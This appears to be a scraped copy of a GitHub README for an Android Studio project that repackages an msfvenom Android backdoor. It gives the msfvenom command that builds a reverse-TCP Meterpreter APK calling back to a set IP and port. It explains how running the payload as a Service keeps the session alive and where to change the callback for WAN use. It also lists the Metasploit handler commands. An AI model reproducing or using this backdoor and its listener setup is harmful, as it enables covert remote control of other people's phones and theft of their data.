GitHub |
您所在的位置:网站首页 › msfvenom 安卓 › GitHub |
msfvenom-backdoor-android
This Android Studio project contains the source code of the backdoored .apk generated by $msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.178.30 LPORT=4444 R > result.apk(in Kali linux suite) Tries to solve the issue: [*]Meterpreter session x closed - Reason:diedmessage, by starting payload in a Service. Meterpreter session is more stable in this way (original msfvenom apk often causes session to die very soon) In this project the backdoor works in LAN settings, opening a meterpreter session to 192.168.178.30 on port 4444 (this settings can be changed in Payload.java file if you want to work in a WAN) The control server must be executing handler exploit with Metasploit, with following commands: $msfconsole $use exploit/multi/handler $set payload android/meterpreter/reverse_tcp $set LHOST 192.168.178.30 $set LPORT 4444 $exploitafter the metasploit machine is waiting, the .apk can be installed and launched on the android terminal. Remember to sign the .apk with a key before installing Tested on Samsung Galaxy S6 - Lollipop |
今日新闻 |
推荐新闻 |
CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |